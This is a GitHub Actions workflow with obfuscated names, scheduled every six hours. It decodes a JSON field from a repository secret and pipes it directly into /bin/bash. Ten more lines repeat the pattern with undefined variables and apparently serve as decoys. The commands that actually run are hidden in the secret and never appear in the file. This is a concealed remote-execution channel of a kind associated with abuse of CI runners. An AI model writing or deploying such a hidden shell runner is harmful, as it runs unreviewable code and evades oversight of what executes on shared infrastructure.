name: caohong19870101

on:
  workflow_dispatch:
  schedule:
    - cron: '38 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: caohong19870101
        env:
          vqk3: ${{ secrets.vqk3 }}
        run: |
          echo $vqk3 | jq -r .zilkm094 | /bin/bash
          echo $ad177 | jq -r .vdv2 | /bin/bash
          echo $cy73445 | jq -r .ao3 | /bin/bash
          echo $dsazv60351 | jq -r .pvbsy49908 | /bin/bash
          echo $nl53178 | jq -r .gq96248 | /bin/bash
          echo $cwcwa6758 | jq -r .hku546 | /bin/bash
          echo $hfm39 | jq -r .qhrp47 | /bin/bash
          echo $mu15 | jq -r .bd3 | /bin/bash
          echo $vfpru8 | jq -r .nhtvx64 | /bin/bash
          echo $blvs41 | jq -r .x038 | /bin/bash
          echo $lsews95 | jq -r .nhrs3 | /bin/bash

